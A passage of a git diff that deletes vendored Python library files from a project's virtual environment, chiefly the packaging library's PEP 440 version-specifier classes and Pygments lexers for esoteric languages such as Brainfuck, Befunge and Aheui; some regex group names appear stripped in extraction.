canonicalize_version -from .version import Version, LegacyVersion, parse - -if TYPE_CHECKING: # pragma: no cover - from typing import ( - List, - Dict, - Union, - Iterable, - Iterator, - Optional, - Callable, - Tuple, - FrozenSet, - ) - - ParsedVersion = Union[Version, LegacyVersion] - UnparsedVersion = Union[Version, LegacyVersion, str] - CallableOperator = Callable[[ParsedVersion, str], bool] - - -class InvalidSpecifier(ValueError): - """ - An invalid specifier was found, users should refer to PEP 440. - """ - - -class BaseSpecifier(with_metaclass(abc.ABCMeta, object)): # type: ignore - @abc.abstractmethod - def __str__(self): - # type: () -> str - """ - Returns the str representation of this Specifier like object. This - should be representative of the Specifier itself. - """ - - @abc.abstractmethod - def __hash__(self): - # type: () -> int - """ - Returns a hash value for this Specifier like object. - """ - - @abc.abstractmethod - def __eq__(self, other): - # type: (object) -> bool - """ - Returns a boolean representing whether or not the two Specifier like - objects are equal. - """ - - @abc.abstractmethod - def __ne__(self, other): - # type: (object) -> bool - """ - Returns a boolean representing whether or not the two Specifier like - objects are not equal. - """ - - @abc.abstractproperty - def prereleases(self): - # type: () -> Optional[bool] - """ - Returns whether or not pre-releases as a whole are allowed by this - specifier. 
- """ - - @prereleases.setter - def prereleases(self, value): - # type: (bool) -> None - """ - Sets whether or not pre-releases as a whole are allowed by this - specifier. - """ - - @abc.abstractmethod - def contains(self, item, prereleases=None): - # type: (str, Optional[bool]) -> bool - """ - Determines if the given item is contained within this specifier. - """ - - @abc.abstractmethod - def filter(self, iterable, prereleases=None): - # type: (Iterable[UnparsedVersion], Optional[bool]) -> Iterable[UnparsedVersion] - """ - Takes an iterable of items and filters them so that only items which - are contained within this specifier are allowed in it. - """ - - -class _IndividualSpecifier(BaseSpecifier): - - _operators = {} # type: Dict[str, str] - - def __init__(self, spec="", prereleases=None): - # type: (str, Optional[bool]) -> None - match = self._regex.search(spec) - if not match: - raise InvalidSpecifier("Invalid specifier: '{0}'".format(spec)) - - self._spec = ( - match.group("operator").strip(), - match.group("version").strip(), - ) # type: Tuple[str, str] - - # Store whether or not this Specifier should accept prereleases - self._prereleases = prereleases - - def __repr__(self): - # type: () -> str - pre = ( - ", prereleases={0!r}".format(self.prereleases) - if self._prereleases is not None - else "" - ) - - return "<{0}({1!r}{2})>".format(self.__class__.__name__, str(self), pre) - - def __str__(self): - # type: () -> str - return "{0}{1}".format(*self._spec) - - @property - def _canonical_spec(self): - # type: () -> Tuple[str, Union[Version, str]] - return self._spec[0], canonicalize_version(self._spec[1]) - - def __hash__(self): - # type: () -> int - return hash(self._canonical_spec) - - def __eq__(self, other): - # type: (object) -> bool - if isinstance(other, string_types): - try: - other = self.__class__(str(other)) - except InvalidSpecifier: - return NotImplemented - elif not isinstance(other, self.__class__): - return NotImplemented - - return self._canonical_spec == other._canonical_spec - - def __ne__(self, other): - # type: (object) -> bool - if isinstance(other, string_types): - try: - other = self.__class__(str(other)) - except InvalidSpecifier: - return NotImplemented - elif not isinstance(other, self.__class__): - return NotImplemented - - return self._spec != other._spec - - def _get_operator(self, op): - # type: (str) -> CallableOperator - operator_callable = getattr( - self, "_compare_{0}".format(self._operators[op]) - ) # type: CallableOperator - return operator_callable - - def _coerce_version(self, version): - # type: (UnparsedVersion) -> ParsedVersion - if not isinstance(version, (LegacyVersion, Version)): - version = parse(version) - return version - - @property - def operator(self): - # type: () -> str - return self._spec[0] - - @property - def version(self): - # type: () -> str - return self._spec[1] - - @property - def prereleases(self): - # type: () -> Optional[bool] - return self._prereleases - - @prereleases.setter - def prereleases(self, value): - # type: (bool) -> None - self._prereleases = value - - def __contains__(self, item): - # type: (str) -> bool - return self.contains(item) - - def contains(self, item, prereleases=None): - # type: (UnparsedVersion, Optional[bool]) -> bool - - # Determine if prereleases are to be allowed or not. 
- if prereleases is None: - prereleases = self.prereleases - - # Normalize item to a Version or LegacyVersion, this allows us to have - # a shortcut for ``"2.0" in Specifier(">=2") - normalized_item = self._coerce_version(item) - - # Determine if we should be supporting prereleases in this specifier - # or not, if we do not support prereleases than we can short circuit - # logic if this version is a prereleases. - if normalized_item.is_prerelease and not prereleases: - return False - - # Actually do the comparison to determine if this item is contained - # within this Specifier or not. - operator_callable = self._get_operator(self.operator) # type: CallableOperator - return operator_callable(normalized_item, self.version) - - def filter(self, iterable, prereleases=None): - # type: (Iterable[UnparsedVersion], Optional[bool]) -> Iterable[UnparsedVersion] - - yielded = False - found_prereleases = [] - - kw = {"prereleases": prereleases if prereleases is not None else True} - - # Attempt to iterate over all the values in the iterable and if any of - # them match, yield them. - for version in iterable: - parsed_version = self._coerce_version(version) - - if self.contains(parsed_version, **kw): - # If our version is a prerelease, and we were not set to allow - # prereleases, then we'll store it for later incase nothing - # else matches this specifier. - if parsed_version.is_prerelease and not ( - prereleases or self.prereleases - ): - found_prereleases.append(version) - # Either this is not a prerelease, or we should have been - # accepting prereleases from the beginning. - else: - yielded = True - yield version - - # Now that we've iterated over everything, determine if we've yielded - # any values, and if we have not and we have any prereleases stored up - # then we will go ahead and yield the prereleases. - if not yielded and found_prereleases: - for version in found_prereleases: - yield version - - -class LegacySpecifier(_IndividualSpecifier): - - _regex_str = r""" - (?P(==|!=|<=|>=|<|>)) - \s* - (?P - [^,;\s)]* # Since this is a "legacy" specifier, and the version - # string can be just about anything, we match everything - # except for whitespace, a semi-colon for marker support, - # a closing paren since versions can be enclosed in - # them, and a comma since it's a version separator. 
- ) - """ - - _regex = re.compile(r"^\s*" + _regex_str + r"\s*$", re.VERBOSE | re.IGNORECASE) - - _operators = { - "==": "equal", - "!=": "not_equal", - "<=": "less_than_equal", - ">=": "greater_than_equal", - "<": "less_than", - ">": "greater_than", - } - - def _coerce_version(self, version): - # type: (Union[ParsedVersion, str]) -> LegacyVersion - if not isinstance(version, LegacyVersion): - version = LegacyVersion(str(version)) - return version - - def _compare_equal(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective == self._coerce_version(spec) - - def _compare_not_equal(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective != self._coerce_version(spec) - - def _compare_less_than_equal(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective <= self._coerce_version(spec) - - def _compare_greater_than_equal(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective >= self._coerce_version(spec) - - def _compare_less_than(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective < self._coerce_version(spec) - - def _compare_greater_than(self, prospective, spec): - # type: (LegacyVersion, str) -> bool - return prospective > self._coerce_version(spec) - - -def _require_version_compare( - fn # type: (Callable[[Specifier, ParsedVersion, str], bool]) -): - # type: (...) -> Callable[[Specifier, ParsedVersion, str], bool] - @functools.wraps(fn) - def wrapped(self, prospective, spec): - # type: (Specifier, ParsedVersion, str) -> bool - if not isinstance(prospective, Version): - return False - return fn(self, prospective, spec) - - return wrapped - - -class Specifier(_IndividualSpecifier): - - _regex_str = r""" - (?P(~=|==|!=|<=|>=|<|>|===)) - (?P - (?: - # The identity operators allow for an escape hatch that will - # do an exact string match of the version you wish to install. - # This will not be parsed by PEP 440 and we cannot determine - # any semantic meaning from it. This operator is discouraged - # but included entirely as an escape hatch. - (?<====) # Only match for the identity operator - \s* - [^\s]* # We just match everything, except for whitespace - # since we are only testing for strict identity. - ) - | - (?: - # The (non)equality operators allow for wild card and local - # versions to be specified so we have to define these two - # operators separately to enable that. - (?<===|!=) # Only match for equals and not equals - - \s* - v? - (?:[0-9]+!)? # epoch - [0-9]+(?:\.[0-9]+)* # release - (?: # pre release - [-_\.]? - (a|b|c|rc|alpha|beta|pre|preview) - [-_\.]? - [0-9]* - )? - (?: # post release - (?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*) - )? - - # You cannot use a wild card and a dev or local version - # together so group them with a | and make them optional. - (?: - (?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release - (?:\+[a-z0-9]+(?:[-_\.][a-z0-9]+)*)? # local - | - \.\* # Wild card syntax of .* - )? - ) - | - (?: - # The compatible operator requires at least two digits in the - # release segment. - (?<=~=) # Only match for the compatible operator - - \s* - v? - (?:[0-9]+!)? # epoch - [0-9]+(?:\.[0-9]+)+ # release (We have a + instead of a *) - (?: # pre release - [-_\.]? - (a|b|c|rc|alpha|beta|pre|preview) - [-_\.]? - [0-9]* - )? - (?: # post release - (?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*) - )? - (?:[-_\.]?dev[-_\.]?[0-9]*)? 
# dev release - ) - | - (?: - # All other operators only allow a sub set of what the - # (non)equality operators do. Specifically they do not allow - # local versions to be specified nor do they allow the prefix - # matching wild cards. - (?=": "greater_than_equal", - "<": "less_than", - ">": "greater_than", - "===": "arbitrary", - } - - @_require_version_compare - def _compare_compatible(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - - # Compatible releases have an equivalent combination of >= and ==. That - # is that ~=2.2 is equivalent to >=2.2,==2.*. This allows us to - # implement this in terms of the other specifiers instead of - # implementing it ourselves. The only thing we need to do is construct - # the other specifiers. - - # We want everything but the last item in the version, but we want to - # ignore post and dev releases and we want to treat the pre-release as - # it's own separate segment. - prefix = ".".join( - list( - itertools.takewhile( - lambda x: (not x.startswith("post") and not x.startswith("dev")), - _version_split(spec), - ) - )[:-1] - ) - - # Add the prefix notation to the end of our string - prefix += ".*" - - return self._get_operator(">=")(prospective, spec) and self._get_operator("==")( - prospective, prefix - ) - - @_require_version_compare - def _compare_equal(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - - # We need special logic to handle prefix matching - if spec.endswith(".*"): - # In the case of prefix matching we want to ignore local segment. - prospective = Version(prospective.public) - # Split the spec out by dots, and pretend that there is an implicit - # dot in between a release segment and a pre-release segment. - split_spec = _version_split(spec[:-2]) # Remove the trailing .* - - # Split the prospective version out by dots, and pretend that there - # is an implicit dot in between a release segment and a pre-release - # segment. - split_prospective = _version_split(str(prospective)) - - # Shorten the prospective version to be the same length as the spec - # so that we can determine if the specifier is a prefix of the - # prospective version or not. - shortened_prospective = split_prospective[: len(split_spec)] - - # Pad out our two sides with zeros so that they both equal the same - # length. - padded_spec, padded_prospective = _pad_version( - split_spec, shortened_prospective - ) - - return padded_prospective == padded_spec - else: - # Convert our spec string into a Version - spec_version = Version(spec) - - # If the specifier does not have a local segment, then we want to - # act as if the prospective version also does not have a local - # segment. - if not spec_version.local: - prospective = Version(prospective.public) - - return prospective == spec_version - - @_require_version_compare - def _compare_not_equal(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - return not self._compare_equal(prospective, spec) - - @_require_version_compare - def _compare_less_than_equal(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - - # NB: Local version identifiers are NOT permitted in the version - # specifier, so local version labels can be universally removed from - # the prospective version. 
- return Version(prospective.public) <= Version(spec) - - @_require_version_compare - def _compare_greater_than_equal(self, prospective, spec): - # type: (ParsedVersion, str) -> bool - - # NB: Local version identifiers are NOT permitted in the version - # specifier, so local version labels can be universally removed from - # the prospective version. - return Version(prospective.public) >= Version(spec) - - @_require_version_compare - def _compare_less_than(self, prospective, spec_str): - # type: (ParsedVersion, str) -> bool - - # Convert our spec to a Version instance, since we'll want to work with - # it as a version. - spec = Version(spec_str) - - # Check to see if the prospective version is less than the spec - # version. If it's not we can short circuit and just return False now - # instead of doing extra unneeded work. - if not prospective < spec: - return False - - # This special case is here so that, unless the specifier itself - # includes is a pre-release version, that we do not accept pre-release - # versions for the version mentioned in the specifier (e.g. <3.1 should - # not match 3.1.dev0, but should match 3.0.dev0). - if not spec.is_prerelease and prospective.is_prerelease: - if Version(prospective.base_version) == Version(spec.base_version): - return False - - # If we've gotten to here, it means that prospective version is both - # less than the spec version *and* it's not a pre-release of the same - # version in the spec. - return True - - @_require_version_compare - def _compare_greater_than(self, prospective, spec_str): - # type: (ParsedVersion, str) -> bool - - # Convert our spec to a Version instance, since we'll want to work with - # it as a version. - spec = Version(spec_str) - - # Check to see if the prospective version is greater than the spec - # version. If it's not we can short circuit and just return False now - # instead of doing extra unneeded work. - if not prospective > spec: - return False - - # This special case is here so that, unless the specifier itself - # includes is a post-release version, that we do not accept - # post-release versions for the version mentioned in the specifier - # (e.g. >3.1 should not match 3.0.post0, but should match 3.2.post0). - if not spec.is_postrelease and prospective.is_postrelease: - if Version(prospective.base_version) == Version(spec.base_version): - return False - - # Ensure that we do not allow a local version of the version mentioned - # in the specifier, which is technically greater than, to match. - if prospective.local is not None: - if Version(prospective.base_version) == Version(spec.base_version): - return False - - # If we've gotten to here, it means that prospective version is both - # greater than the spec version *and* it's not a pre-release of the - # same version in the spec. - return True - - def _compare_arbitrary(self, prospective, spec): - # type: (Version, str) -> bool - return str(prospective).lower() == str(spec).lower() - - @property - def prereleases(self): - # type: () -> bool - - # If there is an explicit prereleases set for this, then we'll just - # blindly use that. - if self._prereleases is not None: - return self._prereleases - - # Look at all of our specifiers and determine if they are inclusive - # operators, and if they are if they are including an explicit - # prerelease. - operator, version = self._spec - if operator in ["==", ">=", "<=", "~=", "==="]: - # The == specifier can include a trailing .*, if it does we - # want to remove before parsing. 
- if operator == "==" and version.endswith(".*"): - version = version[:-2] - - # Parse the version, and if it is a pre-release than this - # specifier allows pre-releases. - if parse(version).is_prerelease: - return True - - return False - - @prereleases.setter - def prereleases(self, value): - # type: (bool) -> None - self._prereleases = value - - -_prefix_regex = re.compile(r"^([0-9]+)((?:a|b|c|rc)[0-9]+)$") - - -def _version_split(version): - # type: (str) -> List[str] - result = [] # type: List[str] - for item in version.split("."): - match = _prefix_regex.search(item) - if match: - result.extend(match.groups()) - else: - result.append(item) - return result - - -def _pad_version(left, right): - # type: (List[str], List[str]) -> Tuple[List[str], List[str]] - left_split, right_split = [], [] - - # Get the release segment of our versions - left_split.append(list(itertools.takewhile(lambda x: x.isdigit(), left))) - right_split.append(list(itertools.takewhile(lambda x: x.isdigit(), right))) - - # Get the rest of our versions - left_split.append(left[len(left_split[0]) :]) - right_split.append(right[len(right_split[0]) :]) - - # Insert our padding - left_split.insert(1, ["0"] * max(0, len(right_split[0]) - len(left_split[0]))) - right_split.insert(1, ["0"] * max(0, len(left_split[0]) - len(right_split[0]))) - - return (list(itertools.chain(*left_split)), list(itertools.chain(*right_split))) - - -class SpecifierSet(BaseSpecifier): - def __init__(self, specifiers="", prereleases=None): - # type: (str, Optional[bool]) -> None - - # Split on , to break each individual specifier into it's own item, and - # strip each item to remove leading/trailing whitespace. - split_specifiers = [s.strip() for s in specifiers.split(",") if s.strip()] - - # Parsed each individual specifier, attempting first to make it a - # Specifier and falling back to a LegacySpecifier. - parsed = set() - for specifier in split_specifiers: - try: - parsed.add(Specifier(specifier)) - except InvalidSpecifier: - parsed.add(LegacySpecifier(specifier)) - - # Turn our parsed specifiers into a frozen set and save them for later. - self._specs = frozenset(parsed) - - # Store our prereleases value so we can use it later to determine if - # we accept prereleases or not. - self._prereleases = prereleases - - def __repr__(self): - # type: () -> str - pre = ( - ", prereleases={0!r}".format(self.prereleases) - if self._prereleases is not None - else "" - ) - - return "".format(str(self), pre) - - def __str__(self): - # type: () -> str - return ",".join(sorted(str(s) for s in self._specs)) - - def __hash__(self): - # type: () -> int - return hash(self._specs) - - def __and__(self, other): - # type: (Union[SpecifierSet, str]) -> SpecifierSet - if isinstance(other, string_types): - other = SpecifierSet(other) - elif not isinstance(other, SpecifierSet): - return NotImplemented - - specifier = SpecifierSet() - specifier._specs = frozenset(self._specs | other._specs) - - if self._prereleases is None and other._prereleases is not None: - specifier._prereleases = other._prereleases - elif self._prereleases is not None and other._prereleases is None: - specifier._prereleases = self._prereleases - elif self._prereleases == other._prereleases: - specifier._prereleases = self._prereleases - else: - raise ValueError( - "Cannot combine SpecifierSets with True and False prerelease " - "overrides." 
- ) - - return specifier - - def __eq__(self, other): - # type: (object) -> bool - if isinstance(other, (string_types, _IndividualSpecifier)): - other = SpecifierSet(str(other)) - elif not isinstance(other, SpecifierSet): - return NotImplemented - - return self._specs == other._specs - - def __ne__(self, other): - # type: (object) -> bool - if isinstance(other, (string_types, _IndividualSpecifier)): - other = SpecifierSet(str(other)) - elif not isinstance(other, SpecifierSet): - return NotImplemented - - return self._specs != other._specs - - def __len__(self): - # type: () -> int - return len(self._specs) - - def __iter__(self): - # type: () -> Iterator[FrozenSet[_IndividualSpecifier]] - return iter(self._specs) - - @property - def prereleases(self): - # type: () -> Optional[bool] - - # If we have been given an explicit prerelease modifier, then we'll - # pass that through here. - if self._prereleases is not None: - return self._prereleases - - # If we don't have any specifiers, and we don't have a forced value, - # then we'll just return None since we don't know if this should have - # pre-releases or not. - if not self._specs: - return None - - # Otherwise we'll see if any of the given specifiers accept - # prereleases, if any of them do we'll return True, otherwise False. - return any(s.prereleases for s in self._specs) - - @prereleases.setter - def prereleases(self, value): - # type: (bool) -> None - self._prereleases = value - - def __contains__(self, item): - # type: (Union[ParsedVersion, str]) -> bool - return self.contains(item) - - def contains(self, item, prereleases=None): - # type: (Union[ParsedVersion, str], Optional[bool]) -> bool - - # Ensure that our item is a Version or LegacyVersion instance. - if not isinstance(item, (LegacyVersion, Version)): - item = parse(item) - - # Determine if we're forcing a prerelease or not, if we're not forcing - # one for this particular filter call, then we'll use whatever the - # SpecifierSet thinks for whether or not we should support prereleases. - if prereleases is None: - prereleases = self.prereleases - - # We can determine if we're going to allow pre-releases by looking to - # see if any of the underlying items supports them. If none of them do - # and this item is a pre-release then we do not allow it and we can - # short circuit that here. - # Note: This means that 1.0.dev1 would not be contained in something - # like >=1.0.devabc however it would be in >=1.0.debabc,>0.0.dev0 - if not prereleases and item.is_prerelease: - return False - - # We simply dispatch to the underlying specs here to make sure that the - # given version is contained within all of them. - # Note: This use of all() here means that an empty set of specifiers - # will always return True, this is an explicit design decision. - return all(s.contains(item, prereleases=prereleases) for s in self._specs) - - def filter( - self, - iterable, # type: Iterable[Union[ParsedVersion, str]] - prereleases=None, # type: Optional[bool] - ): - # type: (...) -> Iterable[Union[ParsedVersion, str]] - - # Determine if we're forcing a prerelease or not, if we're not forcing - # one for this particular filter call, then we'll use whatever the - # SpecifierSet thinks for whether or not we should support prereleases. - if prereleases is None: - prereleases = self.prereleases - - # If we have any specifiers, then we want to wrap our iterable in the - # filter method for each one, this will act as a logical AND amongst - # each specifier. 
- if self._specs: - for spec in self._specs: - iterable = spec.filter(iterable, prereleases=bool(prereleases)) - return iterable - # If we do not have any specifiers, then we need to have a rough filter - # which will filter out any pre-releases, unless there are no final - # releases, and which will filter out LegacyVersion in general. - else: - filtered = [] # type: List[Union[ParsedVersion, str]] - found_prereleases = [] # type: List[Union[ParsedVersion, str]] - - for item in iterable: - # Ensure that we some kind of Version class for this item. - if not isinstance(item, (LegacyVersion, Version)): - parsed_version = parse(item) - else: - parsed_version = item - - # Filter out any item which is parsed as a LegacyVersion - if isinstance(parsed_version, LegacyVersion): - continue - - # Store any item which is a pre-release for later unless we've - # already found a final version or we are accepting prereleases - if parsed_version.is_prerelease and not prereleases: - if not filtered: - found_prereleases.append(item) - else: - filtered.append(item) - - # If we've found no items except for pre-releases, then we'll go - # ahead and use the pre-releases - if not filtered and found_prereleases and prereleases is None: - return found_prereleases - - return filtered diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/esoteric.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/esoteric.py deleted file mode 100644 index ccc280541f3d96325bc1f38dc147452e20df83f1..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/esoteric.py +++ /dev/null @@ -1,301 +0,0 @@ -""" - pygments.lexers.esoteric - ~~~~~~~~~~~~~~~~~~~~~~~~ - - Lexers for esoteric languages. - - :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -from pygments.lexer import RegexLexer, include, words, bygroups -from pygments.token import Comment, Operator, Keyword, Name, String, Number, \ - Punctuation, Error, Whitespace - -__all__ = ['BrainfuckLexer', 'BefungeLexer', 'RedcodeLexer', 'CAmkESLexer', - 'CapDLLexer', 'AheuiLexer'] - - -class BrainfuckLexer(RegexLexer): - """ - Lexer for the esoteric BrainFuck language. - """ - - name = 'Brainfuck' - url = 'http://www.muppetlabs.com/~breadbox/bf/' - aliases = ['brainfuck', 'bf'] - filenames = ['*.bf', '*.b'] - mimetypes = ['application/x-brainfuck'] - - tokens = { - 'common': [ - # use different colors for different instruction types - (r'[.,]+', Name.Tag), - (r'[+-]+', Name.Builtin), - (r'[<>]+', Name.Variable), - (r'[^.,+\-<>\[\]]+', Comment), - ], - 'root': [ - (r'\[', Keyword, 'loop'), - (r'\]', Error), - include('common'), - ], - 'loop': [ - (r'\[', Keyword, '#push'), - (r'\]', Keyword, '#pop'), - include('common'), - ] - } - - def analyse_text(text): - """It's safe to assume that a program which mostly consists of + - - and < > is brainfuck.""" - plus_minus_count = 0 - greater_less_count = 0 - - range_to_check = max(256, len(text)) - - for c in text[:range_to_check]: - if c == '+' or c == '-': - plus_minus_count += 1 - if c == '<' or c == '>': - greater_less_count += 1 - - if plus_minus_count > (0.25 * range_to_check): - return 1.0 - if greater_less_count > (0.25 * range_to_check): - return 1.0 - - result = 0 - if '[-]' in text: - result += 0.5 - - return result - - -class BefungeLexer(RegexLexer): - """ - Lexer for the esoteric Befunge language. - - .. 
versionadded:: 0.7 - """ - name = 'Befunge' - url = 'http://en.wikipedia.org/wiki/Befunge' - aliases = ['befunge'] - filenames = ['*.befunge'] - mimetypes = ['application/x-befunge'] - - tokens = { - 'root': [ - (r'[0-9a-f]', Number), - (r'[+*/%!`-]', Operator), # Traditional math - (r'[<>^v?\[\]rxjk]', Name.Variable), # Move, imperatives - (r'[:\\$.,n]', Name.Builtin), # Stack ops, imperatives - (r'[|_mw]', Keyword), - (r'[{}]', Name.Tag), # Befunge-98 stack ops - (r'".*?"', String.Double), # Strings don't appear to allow escapes - (r'\'.', String.Single), # Single character - (r'[#;]', Comment), # Trampoline... depends on direction hit - (r'[pg&~=@iotsy]', Keyword), # Misc - (r'[()A-Z]', Comment), # Fingerprints - (r'\s+', Whitespace), # Whitespace doesn't matter - ], - } - - -class CAmkESLexer(RegexLexer): - """ - Basic lexer for the input language for the CAmkES component platform. - - .. versionadded:: 2.1 - """ - name = 'CAmkES' - url = 'https://sel4.systems/CAmkES/' - aliases = ['camkes', 'idl4'] - filenames = ['*.camkes', '*.idl4'] - - tokens = { - 'root': [ - # C pre-processor directive - (r'^(\s*)(#.*)(\n)', bygroups(Whitespace, Comment.Preproc, - Whitespace)), - - # Whitespace, comments - (r'\s+', Whitespace), - (r'/\*(.|\n)*?\*/', Comment), - (r'//.*$', Comment), - - (r'[\[(){},.;\]]', Punctuation), - (r'[~!%^&*+=|?:<>/-]', Operator), - - (words(('assembly', 'attribute', 'component', 'composition', - 'configuration', 'connection', 'connector', 'consumes', - 'control', 'dataport', 'Dataport', 'Dataports', 'emits', - 'event', 'Event', 'Events', 'export', 'from', 'group', - 'hardware', 'has', 'interface', 'Interface', 'maybe', - 'procedure', 'Procedure', 'Procedures', 'provides', - 'template', 'thread', 'threads', 'to', 'uses', 'with'), - suffix=r'\b'), Keyword), - - (words(('bool', 'boolean', 'Buf', 'char', 'character', 'double', - 'float', 'in', 'inout', 'int', 'int16_6', 'int32_t', - 'int64_t', 'int8_t', 'integer', 'mutex', 'out', 'real', - 'refin', 'semaphore', 'signed', 'string', 'struct', - 'uint16_t', 'uint32_t', 'uint64_t', 'uint8_t', 'uintptr_t', - 'unsigned', 'void'), - suffix=r'\b'), Keyword.Type), - - # Recognised attributes - (r'[a-zA-Z_]\w*_(priority|domain|buffer)', Keyword.Reserved), - (words(('dma_pool', 'from_access', 'to_access'), suffix=r'\b'), - Keyword.Reserved), - - # CAmkES-level include - (r'(import)(\s+)((?:<[^>]*>|"[^"]*");)', - bygroups(Comment.Preproc, Whitespace, Comment.Preproc)), - - # C-level include - (r'(include)(\s+)((?:<[^>]*>|"[^"]*");)', - bygroups(Comment.Preproc, Whitespace, Comment.Preproc)), - - # Literals - (r'0[xX][\da-fA-F]+', Number.Hex), - (r'-?[\d]+', Number), - (r'-?[\d]+\.[\d]+', Number.Float), - (r'"[^"]*"', String), - (r'[Tt]rue|[Ff]alse', Name.Builtin), - - # Identifiers - (r'[a-zA-Z_]\w*', Name), - ], - } - - -class CapDLLexer(RegexLexer): - """ - Basic lexer for CapDL. - - The source of the primary tool that reads such specifications is available - at https://github.com/seL4/capdl/tree/master/capDL-tool. Note that this - lexer only supports a subset of the grammar. For example, identifiers can - shadow type names, but these instances are currently incorrectly - highlighted as types. Supporting this would need a stateful lexer that is - considered unnecessarily complex for now. - - .. 
versionadded:: 2.2 - """ - name = 'CapDL' - url = 'https://ssrg.nicta.com.au/publications/nictaabstracts/Kuz_KLW_10.abstract.pml' - aliases = ['capdl'] - filenames = ['*.cdl'] - - tokens = { - 'root': [ - # C pre-processor directive - (r'^(\s*)(#.*)(\n)', - bygroups(Whitespace, Comment.Preproc, Whitespace)), - - # Whitespace, comments - (r'\s+', Whitespace), - (r'/\*(.|\n)*?\*/', Comment), - (r'(//|--).*$', Comment), - - (r'[<>\[(){},:;=\]]', Punctuation), - (r'\.\.', Punctuation), - - (words(('arch', 'arm11', 'caps', 'child_of', 'ia32', 'irq', 'maps', - 'objects'), suffix=r'\b'), Keyword), - - (words(('aep', 'asid_pool', 'cnode', 'ep', 'frame', 'io_device', - 'io_ports', 'io_pt', 'notification', 'pd', 'pt', 'tcb', - 'ut', 'vcpu'), suffix=r'\b'), Keyword.Type), - - # Properties - (words(('asid', 'addr', 'badge', 'cached', 'dom', 'domainID', 'elf', - 'fault_ep', 'G', 'guard', 'guard_size', 'init', 'ip', - 'prio', 'sp', 'R', 'RG', 'RX', 'RW', 'RWG', 'RWX', 'W', - 'WG', 'WX', 'level', 'masked', 'master_reply', 'paddr', - 'ports', 'reply', 'uncached'), suffix=r'\b'), - Keyword.Reserved), - - # Literals - (r'0[xX][\da-fA-F]+', Number.Hex), - (r'\d+(\.\d+)?(k|M)?', Number), - (words(('bits',), suffix=r'\b'), Number), - (words(('cspace', 'vspace', 'reply_slot', 'caller_slot', - 'ipc_buffer_slot'), suffix=r'\b'), Number), - - # Identifiers - (r'[a-zA-Z_][-@\.\w]*', Name), - ], - } - - -class RedcodeLexer(RegexLexer): - """ - A simple Redcode lexer based on ICWS'94. - Contributed by Adam Blinkinsop . - - .. versionadded:: 0.8 - """ - name = 'Redcode' - aliases = ['redcode'] - filenames = ['*.cw'] - - opcodes = ('DAT', 'MOV', 'ADD', 'SUB', 'MUL', 'DIV', 'MOD', - 'JMP', 'JMZ', 'JMN', 'DJN', 'CMP', 'SLT', 'SPL', - 'ORG', 'EQU', 'END') - modifiers = ('A', 'B', 'AB', 'BA', 'F', 'X', 'I') - - tokens = { - 'root': [ - # Whitespace: - (r'\s+', Whitespace), - (r';.*$', Comment.Single), - # Lexemes: - # Identifiers - (r'\b(%s)\b' % '|'.join(opcodes), Name.Function), - (r'\b(%s)\b' % '|'.join(modifiers), Name.Decorator), - (r'[A-Za-z_]\w+', Name), - # Operators - (r'[-+*/%]', Operator), - (r'[#$@<>]', Operator), # mode - (r'[.,]', Punctuation), # mode - # Numbers - (r'[-+]?\d+', Number.Integer), - ], - } - - -class AheuiLexer(RegexLexer): - """ - Aheui is esoteric language based on Korean alphabets. - """ - - name = 'Aheui' - url = 'http://aheui.github.io/' - aliases = ['aheui'] - filenames = ['*.aheui'] - - tokens = { - 'root': [ - ('[' - '나-낳냐-냫너-넣녀-녛노-놓뇨-눟뉴-닇' - '다-닿댜-댷더-덯뎌-뎧도-돟됴-둫듀-딓' - '따-땋땨-떃떠-떻뗘-뗳또-똫뚀-뚷뜌-띟' - '라-랗랴-럏러-렇려-렿로-롷료-뤃류-릫' - '마-맣먀-먛머-멓며-몋모-뫃묘-뭏뮤-믷' - '바-밯뱌-뱧버-벟벼-볗보-봏뵤-붛뷰-빃' - '빠-빻뺘-뺳뻐-뻫뼈-뼣뽀-뽛뾰-뿧쀼-삏' - '사-샇샤-샿서-섷셔-셯소-솧쇼-숳슈-싛' - '싸-쌓쌰-썋써-쎃쎠-쎻쏘-쏳쑈-쑿쓔-씧' - '자-잫쟈-쟣저-젛져-졓조-좋죠-줗쥬-즿' - '차-챃챠-챻처-첳쳐-쳫초-촣쵸-춯츄-칗' - '카-캏캬-컇커-컿켜-켷코-콯쿄-쿻큐-킣' - '타-탛탸-턓터-텋텨-톃토-톻툐-퉇튜-틯' - '파-팧퍄-퍟퍼-펗펴-폏포-퐇표-풓퓨-픻' - '하-핳햐-햫허-헣혀-혛호-홓효-훟휴-힇' - ']', Operator), - ('.', Comment), - ], - } diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/styles/solarized.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/styles/solarized.py deleted file mode 100644 index e75aa602fedece79436890b6ce854579e0dad65f..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/styles/solarized.py +++ /dev/null @@ -1,137 +0,0 @@ -""" - pygments.styles.solarized - ~~~~~~~~~~~~~~~~~~~~~~~~~ - - Solarized by Camil Staps - - A Pygments style for the Solarized themes (licensed under MIT). 
